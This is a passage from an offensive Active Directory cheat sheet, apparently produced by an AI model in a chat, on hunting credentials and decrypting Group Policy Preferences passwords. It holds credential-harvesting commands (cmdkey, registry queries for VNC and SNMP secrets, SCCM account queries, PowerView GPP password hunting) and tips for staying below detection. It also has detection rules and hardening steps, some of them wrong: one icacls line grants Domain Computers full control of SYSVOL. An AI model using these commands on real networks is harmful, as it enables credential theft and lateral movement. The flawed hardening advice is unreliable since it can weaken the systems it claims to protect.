    382 # โ”€โ”€ Windows Credential Manager โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    383 cmdkey /list
    384 
    385 # โ”€โ”€ VNC saved passwords โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    386 reg query HKLM\SOFTWARE\RealVNC\WinVNC4 /v password
    387 reg query HKCU\Software\TightVNC\Server
    388 
    389 # โ”€โ”€ SNMP community strings โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    390 reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
    391 
    392 # โ”€โ”€ SCCM / ConfigMgr NAA credentials โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    393 Get-WmiObject -Namespace root\ccm\policy\Machine\ActualConfig `
    394   -Class CCM_NetworkAccessAccount 2>$null
    395 ```
    396 
    397 ***
    398 
    399 #### ๐Ÿ”ด Hunting Credentials with PowerView (Domain-Wide)
    400 
    401 ```powershell
    402 Import-Module .\PowerView.ps1
    403 
    404 # โ”€โ”€ Find all accessible shares across the domain โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    405 Find-DomainShare -Verbose
    406 
    407 # โ”€โ”€ Find interesting files on accessible shares โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    408 Find-InterestingDomainShareFile -Include "*.config","*.xml","*.txt","*.bat","*.ps1"
    409 
    410 # โ”€โ”€ Find GPP passwords specifically โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    411 Get-DomainGPO | Get-GPPPassword
    412 
    413 # โ”€โ”€ Search for password files across domain โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    414 Find-InterestingDomainShareFile -Include "*password*","*creds*","*credential*"
    415 ```
    416 
    417 ***
    418 
    419 ## ๐Ÿงฉ Troubleshooting
    420 
    421 | Error | Cause | Fix |
    422 |---|---|---|
    423 | **gpp-decrypt returns garbage / mojibake** | Incorrect base64 padding or corrupted cpassword field | Verify cpassword string is complete; check for XML encoding issues; try pypykatz instead |
    424 | **SYSVOL mount fails: "Permission denied"** | User account doesn't have read access to SYSVOL share | Verify user is in domain (not local); try with different credentials; check SMB 445 firewall rule |
    425 | **Snaffler "access denied" on specific share** | User account lacks read permissions on target share | Use `nxc smb --shares` to enumerate readable shares first; skip denied shares |
    426 | **GPP password changed after XML creation** | Administrator rotated the password locally after GPP was deployed | Verify decrypted password against current accounts; may be outdated โ€” try on other systems |
    427 | **No cpassword fields found in SYSVOL** | Either no GPP policies with embedded credentials exist, or MS14-025 was applied + old XMLs deleted | Try broader credential hunting methods (Snaffler, PowerHuntShares); check if LAPS deployed instead |
    428 | **Trufflehog git scan finds nothing** | No credentials committed to git history, or repo is too new | Check commit history depth; expand regex patterns for broader match |
    429 | **Seatbelt credential extraction "access denied"** | Requires user token or admin to decrypt DPAPI credentials | Run as admin; try registry-based hunting instead (AutoLogon, PuTTY keys) |
    430 | **Decrypted GPP password doesn't work on multiple machines** | Local administrator password was changed manually on some systems after GPP was applied | Test password on each system individually; keep list of which systems use which password |
    431 
    432 ***
    433 
    434 ## ๐ŸŽฏ OPSEC Tips
    435 
    436 - **Read SYSVOL over LDAP first, not SMB** โ€” LDAP-based GPO enumeration generates fewer file access events than direct SMB reads of SYSVOL
    437 - **Use Snaffler over manual grep** in engagements โ€” it's purpose-built, fast, and produces colour-coded output ranked by severity; manual methods trigger more SMB access events
    438 - **Don't open files โ€” read content remotely** โ€” opening files in interactive applications (Excel, Notepad) generates additional process creation events; use `Get-Content` or `cat` instead
    439 - **Start with SYSVOL/NETLOGON** before broader hunting โ€” these are guaranteed readable by all domain users and frequently contain the highest-value credentials with minimum OPSEC risk
    440 - **Check `Groups.xml` first** โ€” this is where local admin passwords live and is the most common GPP vulnerability encountered in real environments
    441 - **Verify GPP cpasswords are still valid** before using them โ€” the password may have been changed manually even if the GPP XML was never cleaned up
    442 - **SCCM Network Access Account (NAA) credentials** are frequently DA-level or broad network access โ€” always check if SCCM is deployed
    443 - **Time-to-execute estimate:** SYSVOL enumeration + decryption (10โ€“15 min) + broader share hunting (20โ€“45 min) = 30โ€“60 minutes total
    444 - **Tool versions:** NetExec preferred over CrackMapExec (actively maintained); Snaffler for Windows; Trufflehog v3+ for git scanning
    445 
    446 ***
    447 
    448 ## ๐Ÿ›ก๏ธ Detection โ€” Event IDs
    449 
    450 | Event ID | Source | What to Look For |
    451 |---|---|---|
    452 | **5145** | Security Log | Network share object accessed โ€” bulk reads of `SYSVOL\*.xml` from a single IP |
    453 | **5140** | Security Log | Network share accessed โ€” unusual access to `SYSVOL` or `NETLOGON` from workstations |
    454 | **4663** | Security Log | Attempt made to access object โ€” file reads in SYSVOL (requires object auditing enabled) |
    455 | **4688** | Security Log | Process creation โ€” `findstr.exe` with `cpassword` argument |
    456 | **Sysmon EID 1** | Sysmon | `Snaffler.exe`, `Get-GPPPassword.ps1` or `gpp-decrypt` execution |
    457 | **Sysmon EID 3** | Sysmon | Network connection from unexpected process to SMB port 445 on DC |
    458 | **LDAP query logs** | DC Diagnostic | Bulk GPO object enumeration via LDAP in short time window |
    459 
    460 **Primary detection signature:** Multiple SMB file access events (5145) against `\\DC\SYSVOL\...\Policies\**\*.xml` from a single non-admin workstation within a short window is the clearest indicator. In a normal environment, only domain controllers and management workstations read SYSVOL bulk XML โ€” a user workstation accessing dozens of GPO XML files is anomalous.
    461 
    462 ### Sigma Rules for Detection
    463 
    464 **Rule: Suspicious GPP XML Enumeration**
    465 ```yaml
    466 title: Bulk SYSVOL GPP XML Access from Non-DC
    467 detection:
    468   selection:
    469     EventID: 5145
    470     ShareName: SYSVOL
    471     RelativeTargetName|contains: 'Policies'
    472     RelativeTargetName|endswith: '.xml'
    473     SourceIP: '!10.10.10.10'  # Exclude DC/admin IPs
    474   condition: selection | count(SourceIP) by SourceIP > 10 and timespan(5m)
    475 ```
    476 
    477 **Rule: Suspicious gpp-decrypt or Get-GPPPassword Execution**
    478 ```yaml
    479 title: GPP Password Decryption Tool Execution
    480 detection:
    481   selection_process:
    482     Image|endswith:
    483       - 'gpp-decrypt.exe'
    484       - 'Get-GPPPassword.ps1'
    485       - 'pypykatz.exe'
    486   selection_network:
    487     DestinationPort: 445
    488     Protocol: SMB
    489   condition: selection_process and selection_network
    490 ```
    491 
    492 ### EDR-Specific Detections
    493 
    494 - **Crowdstrike Falcon:** Flag Snaffler.exe execution + bulk SMB 445 connections; alert on gpp-decrypt with network activity
    495 - **Defender for Endpoint:** Monitor for Get-GPPPassword.ps1 script execution; alert on bulk file reads from SYSVOL
    496 - **Sentinel One:** Correlate PowerShell commands containing "cpassword" with file access events
    497 - **Carbon Black:** Watch for Python-based credential extraction (trufflehog, pypykatz) with network connections to SMB
    498 
    499 ### Hardening Commands
    500 
    501 ```powershell
    502 # โ”€โ”€ Find and DELETE old GPP XML files from SYSVOL โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    503 Get-ChildItem -Path "\\DC01\SYSVOL\" -Recurse -Include "Groups.xml","Services.xml",`
    504   "ScheduledTasks.xml","DataSources.xml","Drives.xml","Printers.xml" |
    505   Where-Object {$_.LastWriteTime -lt (Get-Date).AddYears(-1)} |
    506   Remove-Item -Force -WhatIf  # Remove -WhatIf after verification
    507 
    508 # โ”€โ”€ Deploy LAPS (Local Administrator Password Solution) โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    509 # Install LAPS management tools
    510 Install-Module LAPS -Repository PSGallery -Force
    511 
    512 # Configure LAPS via Group Policy
    513 # Computer Configuration โ†’ Policies โ†’ Administrative Templates โ†’
    514 #   Microsoft LAPS โ†’ Enable LAPS
    515 
    516 # For Windows LAPS (2023+) โ€” modern replacement for legacy LAPS
    517 # Install via Windows Update / WSUS; configure via Group Policy or MDM
    518 
    519 # โ”€โ”€ Enforce LDAP signing to prevent relay attacks (bonus mitigation) โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    520 dsregcmd /status
    521 # Set via Group Policy:
    522 # Computer Config โ†’ Windows Settings โ†’ Security Settings โ†’ Local Policies โ†’
    523 #   Security Options:
    524 #   "Domain member: Require strong session key (Windows 2000 or later)" = Enabled
    525 #   "LDAP client signing requirements" = Require signing
    526 
    527 # โ”€โ”€ Restrict SYSVOL read access (advanced โ€” breaks some scenarios) โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    528 icacls "\\DC01\SYSVOL" /grant "Domain Computers":(OI)(CI)(F) /T
    529 icacls "\\DC01\SYSVOL" /remove "Authenticated Users" /T
    530 # WARNING: Only for hardened environments; may break GPO application for workstations
    531 
    532 # โ”€โ”€ Audit SYSVOL access (enable file auditing) โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    533 auditpol /set /subcategory:"File Share" /success:enable /failure:enable
    534 # Enable object auditing on SYSVOL:
    535 # Properties โ†’ Security โ†’ Advanced โ†’ Auditing โ†’ Add "Everyone" with "Read" success
    536 ```
    537 
    538 ***
    539 
    540 ## ๐Ÿ—บ๏ธ MITRE ATT&CK
    541 
    542 | Technique | ID | Description |
    543 |---|---|---|
    544 | **Credentials in Files** | T1552.001 | Plaintext credentials found in config files, scripts, shares |
    545 | **Group Policy Preferences** | T1552.006 | Decryption of GPP cpassword fields using published AES key |
    546 | **Unsecured Credentials** | T1552 | General category of credential exposure via unencrypted storage |
    547 | **Credential Dumping** | T1003 | DPAPI credential extraction (overlapping technique) |
    548 | **Account Discovery** | T1087 | Enumeration of user accounts from GPP + SYSVOL hunting |
    549 | **Lateral Movement** | T1570 | Using discovered credentials for PtH, credential spray across domain |
    550 
    551 ***
    552 
    553 ## ๐Ÿ”— Attack Chain Context
    554 
    555 ```
    556 [Credential Hunting / GPP Passwords] โ”€โ”€โ†’ Plaintext Credentials Recovered
    557          โ”‚
    558          โ”œโ”€โ”€โ†’ ๐Ÿ”‘ GPP local admin password โ†’ PtH across all domain workstations
    559          โ”œโ”€โ”€โ†’ ๐Ÿ”‘ Service account creds in script โ†’ Kerberoasting target eliminated
    560          โ”œโ”€โ”€โ†’ ๐Ÿ”‘ Database SA password โ†’ direct database access / data exfil
    561          โ”œโ”€โ”€โ†’ ๐ŸŽซ Valid domain creds โ†’ BloodHound enumeration โ†’ full attack path
    562          โ”œโ”€โ”€โ†’ ๐Ÿ”‘ KeePass .kdbx found โ†’ crack master password โ†’ full vault access
    563          โ”œโ”€โ”€โ†’ ๐Ÿ”‘ Git repo secrets โ†’ API keys, deployment credentials โ†’ lateral access
    564          โ””โ”€โ”€โ†’ ๐Ÿ”‘ SCCM NAA creds โ†’ often domain-wide read access or DA equivalent
    565 
    566 ```
    567 
    568 **The compounding effect:** GPP credentials, when found, are almost always **local administrator passwords** deployed domain-wide via GPP โ€” meaning the **same decrypted password works on every workstation in the domain** simultaneously. A single `cpassword` field in a Groups.xml file from 2016 can still compromise 500 machines in 2026 if it was never rotated.
    569 
    570 **Cross-references:**
    571 - Attack #72: LAPS Deprecation & Takeover (modern LAPS v2 as GPP replacement)
    572 - Attack #9: mitm6 (complementary technique โ€” often combined if credentials insufficient)
    573 - Kerberoasting (Attack #11+) for service account targeting discovered via credential hunting
    574 
    575 ***
    576 
    577 > โœ… **Attack #10 โ€” Credential Hunting / GPP Passwords complete.**
    578 >
    579 > ๐ŸŽ‰ **Category 1 โ€” Credential Attacks is now finished.** That's all 10 attacks in the first category covered with full cheat sheets.
    580 >
    581 > Tell me to move on when you're ready to begin **Category 2 โ€” Kerberos Abuse**, starting with **Attack #11 โ€” Golden Ticket Attack**.
    582 
    583 Sources
    584  Plaintext Password Extraction Attack - Netwrix https://netwrix.com/en/cybersecurity-glossary/cyber-security-attacks/plaintext-password-extraction-attack/
    585  Pentest-Hints/AD Hunting Passwords In SYSVOL.md at master https://github.com/ahmetgurel/Pentest-Hints/blob/master/AD%20Hunting%20Passwords%20In%20SYSVOL.md
    586  Group Policy Preferences | The Hacker Recipes https://legacy.thehacker.recipes/a-d/movement/credentials/dumping/group-policies-preferences
    587  GPP attacks | Internal Pentest https://xedex.gitbook.io/internalpentest/internal-pentest/active-directory/post-compromise-attacks/gpp-attacks
    588  Unsecured Credentials: Group Policy Preferences - MITRE ATT&CKยฎ https://attack.mitre.org/techniques/T1552/006/
    589  Hunting Passwords In SYSVOL - Network Intelligence https://www.networkintelligence.ai/blogs/hunting-passwords-in-sysvol/
    590  Password in Group Policy Preferences (GPP) Compromise https://rootguard.gitbook.io/cyberops/detection-engineering/threat-detection/ad-detections-and-mitigations/password-in-group-policy-preferences-gpp-compromise
    591  Automated Implementation of Windows-related Security-Configuration
    592   Guides https://arxiv.org/pdf/2209.08936.pdf
    593  Search-based Ordered Password Generation of Autoregressive Neural
    594   Networks http://arxiv.org/pdf/2403.09954.pdf
    595  Universal Neural-Cracking-Machines: Self-Configurable Password Models
    596   from Auxiliary Data http://arxiv.org/pdf/2301.07628.pdf
    597  SE#PCFG: Semantically Enhanced PCFG for Password Analysis and Cracking https://arxiv.org/pdf/2306.06824.pdf
    598  Detecting Forged Kerberos Tickets in an Active Directory Environment https://arxiv.org/ftp/arxiv/papers/2301/2301.00044.pdf
    599  HADES: Detecting Active Directory Attacks via Whole Network Provenance
    600   Analytics http://arxiv.org/pdf/2407.18858.pdf
    601  Alice in Passphraseland: Assessing the Memorability of Familiar
    602   Vocabularies for System-Assigned Passphrases https://arxiv.org/pdf/2112.03359.pdf
    603  When AI Defeats Password Deception! A Deep Learning Framework to
    604   Distinguish Passwords and Honeywords http://arxiv.org/pdf/2407.16964.pdf
    605  Group Policy Preferences - Tactics, Techniques, and Procedures https://ttp.parzival.sh/pentesting/infrastructure/active-directory/group-policy-preferences
    606  Group Policy Preferences (GPP) password retrieval | The guide https://reaper.gitbook.io/my-penetration-test-guide/guide/privilege-escalation/windows-privilege-escalation/group-policy-preferences-gpp-password-retrieval
    607  Group Policy Preferences - Tidal Cyber https://app.tidalcyber.com/techniques/57dd1624-42e9-42a6-b1bb-d1d1df233138
    608  Attacking Active Directory - GPP Credentials https://www.youtube.com/watch?v=sTedpt47t2Y
    609  Attacking GPP (Group Policy Preferences) Credentials | Active Directory Pentesting https://infosecwriteups.com/attacking-gpp-group-policy-preferences-credentials-active-directory-pentesting-16d9a65fa01a?gi=e5aac7720d23
    610  Group Policy Preferences | yuyudhn's notes https://htb.linuxsec.org/active-directory/credential-hunting/group-policy-preferences
    611  Attacking GPP (Group Policy Preferences) Credentials - Reddit https://www.reddit.com/r/InfoSecWriteups/comments/xdvst4/attacking-gpp-group-policy-preferences/
    612  Group Policy Preferences (GPP) Passwords in SYSVOL - Haxoris Wiki https://haxoris.com/haxoris-wiki/active-directory/gpp-cpassword-in-sysvol